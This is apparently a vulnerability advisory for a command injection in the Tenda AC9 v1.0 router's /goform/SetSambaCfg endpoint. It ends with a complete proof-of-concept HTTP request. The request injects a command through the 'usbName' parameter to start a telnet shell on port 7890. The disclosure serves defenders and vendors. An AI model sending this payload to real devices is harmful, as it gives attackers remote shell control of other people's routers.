| Vendor | Tenda |
|---|---|
| Product | Tenda ac9 router |
| Hardware Version | V1.0 |
| Firmware Version | V15.03.05.19 |
https://www.tenda.com.cn/material/show/102682
In the Tenda ac9 v1.0 router with the firmware version of V15.03.05.19, there is a command injection vulnerability in the route /goform/SetSambaCfg, which may lead to remote arbitrary code execution.
In the backend processing function formSetSamba of route /goform/SetSambaCfg, the HTTP POST request parameters "action" and "usbName" are obtained through the function sub_2B9D4. When the content of the parameter "action" is "del", the parameter "usbName" will be spliced into doSystemCmd by a formatted string and then executed. Attackers can construct malicious parameters "action" and "usbName" to achieve remote code execution.
POST /goform/SetSambaCfg HTTP/1.1
Host: 192.168.0.1
Content-Length: 47
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/wifi_wps.html?random=0.5358142303799198&>
Accept-Encoding: gzip, deflate, br
Cookie: password=5f4dcc3b5aa765d61d8327deb882cf99isqtgb
Connection: keep-alive
action=del&usbName=1;telnetd -l /bin/sh -p 7890